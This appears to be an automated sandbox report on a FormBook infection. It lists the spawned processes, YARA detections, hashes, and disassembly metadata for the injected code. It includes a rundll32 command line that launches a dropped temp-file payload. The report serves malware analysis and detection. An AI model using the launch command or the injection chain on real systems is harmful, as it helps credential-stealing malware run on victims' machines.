                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:3
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C
                                                                                                Imagebase:0x4a1f0000
                                                                                                File size:302'592 bytes
                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:5
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
                                                                                                Imagebase:0x300000
                                                                                                File size:44'544 bytes
                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:6
                                                                                                Start time:04:03:20
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C
                                                                                                Imagebase:0xfff20000
                                                                                                File size:45'568 bytes
                                                                                                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:9
                                                                                                Start time:04:03:26
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
                                                                                                Imagebase:0xde0000
                                                                                                File size:92'936 bytes
                                                                                                MD5 hash:44131EEA626ABDBEF6631F72C007FC0E
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:true

                                                                                                General

                                                                                                Target ID:10
                                                                                                Start time:04:04:08
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe"
                                                                                                Imagebase:0x1260000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:11
                                                                                                Start time:04:04:10
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Windows\SysWOW64\convert.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Windows\SysWOW64\convert.exe"
                                                                                                Imagebase:0xa20000
                                                                                                File size:17'408 bytes
                                                                                                MD5 hash:FA5C490197C97EC58CF751F8CE6439D3
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:low
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:12
                                                                                                Start time:04:04:22
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe"
                                                                                                Imagebase:0x1260000
                                                                                                File size:140'800 bytes
                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:high
                                                                                                Has exited:false

                                                                                                General

                                                                                                Target ID:17
                                                                                                Start time:04:04:37
                                                                                                Start date:11/11/2024
                                                                                                Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
                                                                                                Imagebase:0xf00000
                                                                                                File size:517'064 bytes
                                                                                                MD5 hash:C2D924CE9EA2EE3E7B7E6A7C476619CA
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                Reputation:moderate
                                                                                                Has exited:true

                                                                                                Disassembly

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:1.7%
                                                                                                  Dynamic/Decrypted Code Coverage:3.9%
                                                                                                  Signature Coverage:11.7%
                                                                                                  Total number of Nodes:128
                                                                                                  Total number of Limit Nodes:8
                                                                                                  execution_graph 67778 42bb63 67779 42bb80 67778->67779 67782 87fdc0 LdrInitializeThunk 67779->67782 67780 42bba8 67782->67780 67783 424983 67784 42499f 67783->67784 67785 4249c7 67784->67785 67786 4249db 67784->67786 67787 42c563 NtClose 67785->67787 67793 42c563 67786->67793 67789 4249d0 67787->67789 67790 4249e4 67796 42e733 RtlAllocateHeap 67790->67796 67792 4249ef 67794 42c580 67793->67794 67795 42c591 NtClose 67794->67795 67795->67790 67796->67792 67905 424d13 67909 424d2c 67905->67909 67906 424d77 67907 42e613 RtlFreeHeap 67906->67907 67908 424d84 67907->67908 67909->67906 67910 424db4 67909->67910 67912 424db9 67909->67912 67911 42e613 RtlFreeHeap 67910->67911 67911->67912 67913 42f6b3 67914 42f6c3 67913->67914 67915 42f6c9 67913->67915 67916 42e6f3 RtlAllocateHeap 67915->67916 67917 42f6ef 67916->67917 67797 41e523 67798 41e549 67797->67798 67802 41e643 67798->67802 67803 42f7e3 67798->67803 67800 41e5e4 67800->67802 67809 42bbb3 67800->67809 67804 42f753 67803->67804 67806 42f7b0 67804->67806 67813 42e6f3 67804->67813 67806->67800 67807 42f78d 67816 42e613 67807->67816 67810 42bbcd 67809->67810 67825 87fae8 LdrInitializeThunk 67810->67825 67811 42bbf9 67811->67802 67819 42c893 67813->67819 67815 42e70b 67815->67807 67822 42c8e3 67816->67822 67818 42e629 67818->67806 67820 42c8b0 67819->67820 67821 42c8c1 RtlAllocateHeap 67820->67821 67821->67815 67823 42c8fd 67822->67823 67824 42c90e RtlFreeHeap 67823->67824 67824->67818 67825->67811 67918 414153 67919 414163 67918->67919 67920 4141d0 67919->67920 67921 4141bf PostThreadMessageW 67919->67921 67921->67920 67922 41b353 67923 41b397 67922->67923 67924 42c563 NtClose 67923->67924 67925 41b3b8 67923->67925 67924->67925 67826 401b03 67827 401b10 67826->67827 67830 42fb83 67827->67830 67833 42e1d3 67830->67833 67834 42e1f9 67833->67834 67845 407433 67834->67845 67836 42e20f 67844 401c0b 67836->67844 67848 41b163 67836->67848 67838 42e243 67859 428243 67838->67859 67839 42e22e 67839->67838 67863 42c933 67839->67863 67842 42e25d 67843 42c933 ExitProcess 67842->67843 67843->67844 67866 416583 67845->67866 67847 407440 67847->67836 67849 41b18f 67848->67849 67877 41b053 67849->67877 67852 41b1d4 67854 41b1f0 67852->67854 67857 42c563 NtClose 67852->67857 67853 41b1bc 67855 41b1c7 67853->67855 67856 42c563 NtClose 67853->67856 67854->67839 67855->67839 67856->67855 67858 41b1e6 67857->67858 67858->67839 67860 4282a5 67859->67860 67862 4282b2 67860->67862 67888 4186c3 67860->67888 67862->67842 67864 42c94d 67863->67864 67865 42c95e ExitProcess 67864->67865 67865->67838 67867 41659d 67866->67867 67869 4165b3 67867->67869 67870 42cfd3 67867->67870 67869->67847 67872 42cfed 67870->67872 67871 42d01c 67871->67869 67872->67871 67873 42bbb3 LdrInitializeThunk 67872->67873 67874 42d076 67873->67874 67875 42e613 RtlFreeHeap 67874->67875 67876 42d08c 67875->67876 67876->67869 67878 41b06d 67877->67878 67882 41b149 67877->67882 67883 42bc53 67878->67883 67881 42c563 NtClose 67881->67882 67882->67852 67882->67853 67884 42bc6d 67883->67884 67887 8807ac LdrInitializeThunk 67884->67887 67885 41b13d 67885->67881 67887->67885 67889 4186ed 67888->67889 67895 418beb 67889->67895 67896 413dc3 67889->67896 67891 418814 67892 42e613 RtlFreeHeap 67891->67892 67891->67895 67893 41882c 67892->67893 67894 42c933 ExitProcess 67893->67894 67893->67895 67894->67895 67895->67862 67898 413de3 67896->67898 67899 413e4c 67898->67899 67901 41b473 RtlFreeHeap LdrInitializeThunk 67898->67901 67899->67891 67900 413e42 67900->67891 67901->67900 67902 418e05 67903 42c563 NtClose 67902->67903 67904 418e0f 67903->67904 67926 413c36 67927 413bfb 67926->67927 67927->67926 67930 413bbe 67927->67930 67931 42c7f3 67927->67931 67932 42c810 67931->67932 67935 87fb68 LdrInitializeThunk 67932->67935 67933 413c02 67935->67933 67936 87f9f0 LdrInitializeThunk

                                                                                                  Executed Functions

                                                                                                  Function 0042C563 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 81 42c563-42c59f call 4048f3 call 42d7b3 NtClose
                                                                                                  APIs
                                                                                                  • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C59A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 3535843008-0
                                                                                                  • Opcode ID: d39154f4b1042c8076c574a901c09fb7df87b5706c8acd1970128f18ccb112a1
                                                                                                  • Instruction ID: 0270498e34e306ef69e75ccbf88dd0066c1dfa7ba39362fc1fefa573247f1674
                                                                                                  • Opcode Fuzzy Hash: d39154f4b1042c8076c574a901c09fb7df87b5706c8acd1970128f18ccb112a1
                                                                                                  • Instruction Fuzzy Hash: B3E046363002147BD620BAAAEC41F9B776CEFC5714F50842AFA48A7281C6B5B91587F5
                                                                                                  Function 008807AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 95 8807ac-8807c1 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                  • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                                                  • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                                                  • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                                                  Function 0087F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 91 87f9f0-87fa05 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                  • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                  • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                  • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                  Function 0087FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 92 87fae8-87fafd LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                  • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                                                                  • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                                                                  • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                                                                  Function 0087FB68 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 93 87fb68-87fb7d LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                  • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                  • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                  • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                  Function 0087FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 94 87fdc0-87fdd5 LdrInitializeThunk
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000860000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000960000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000964000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000967000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.0000000000970000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  • Associated: 00000009.00000002.497469157.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_860000_ImagingDevices.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                  • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                  • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                  • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                  Function 004186C3 Relevance: .4, Instructions: 436COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: fd4c66594d0b0bf39a475210e310c1fb272bb8bcf6e4a62b257e39d8d39b8d2b
                                                                                                  • Instruction ID: 23e73a834570aecd08460a8b7e4f4b838cd4d8d1d093b2a758330bc817fd2144
                                                                                                  • Opcode Fuzzy Hash: fd4c66594d0b0bf39a475210e310c1fb272bb8bcf6e4a62b257e39d8d39b8d2b
                                                                                                  • Instruction Fuzzy Hash: A0F1A1B0D00219AFDB24DF55CC81AEEB7B8AF44304F1481AFE515A7341DB78AA85CF99
                                                                                                  Function 004140FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: 0f860e54958a788d109e95205eb8c421ec4e45f0df9d19f714ae64d8604edf5a
                                                                                                  • Instruction ID: fbceb0e1d869972590f9eab5db8387fc513db08b05393990d17a75f8aa77820b
                                                                                                  • Opcode Fuzzy Hash: 0f860e54958a788d109e95205eb8c421ec4e45f0df9d19f714ae64d8604edf5a
                                                                                                  • Instruction Fuzzy Hash: 8F215E72D01248BBC7119BA59C82CEFBB7CEF81354F40846EF91467201D7785E028BA4
                                                                                                  Function 00414151 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: ff30eac129e63dd3bfb3ec804e9d87b30dc75ff0e1fd2fb88da7ed881d8e40f8
                                                                                                  • Instruction ID: 11fdab42c02f6534fa46d3ae9712a4795323e9382ac4f9be012f285653c565a5
                                                                                                  • Opcode Fuzzy Hash: ff30eac129e63dd3bfb3ec804e9d87b30dc75ff0e1fd2fb88da7ed881d8e40f8
                                                                                                  • Instruction Fuzzy Hash: C701E5B1D0015C7AEB019AD69C81DEF7B7CDF81398F40846AF904A7101D67C4E0687A5
                                                                                                  Function 00414153 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(2-4C93H,00000111,00000000,00000000), ref: 004141CA
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID: 2-4C93H$2-4C93H
                                                                                                  • API String ID: 1836367815-2145140999
                                                                                                  • Opcode ID: 048a6b87aa7270504312d33b1c3c258aa7b1a11dc077cc88d4becbb04c59c438
                                                                                                  • Instruction ID: c65e53d4b7a7b16466f25411da96260320759b269483fd5d9de3e4652ac109b9
                                                                                                  • Opcode Fuzzy Hash: 048a6b87aa7270504312d33b1c3c258aa7b1a11dc077cc88d4becbb04c59c438
                                                                                                  • Instruction Fuzzy Hash: AD01C8B1D0011C7AEB11AAE69C81DEF7B7CDF41798F44846AF904B7141D6784E0647A5
                                                                                                  Function 0042C8E3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 76 42c8e3-42c924 call 4048f3 call 42d7b3 RtlFreeHeap
                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4C656368,00000007,00000000,00000004,00000000,00417134,000000F4), ref: 0042C91F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000009.00000002.497429027.0000000000400000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_9_2_400000_ImagingDevices.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
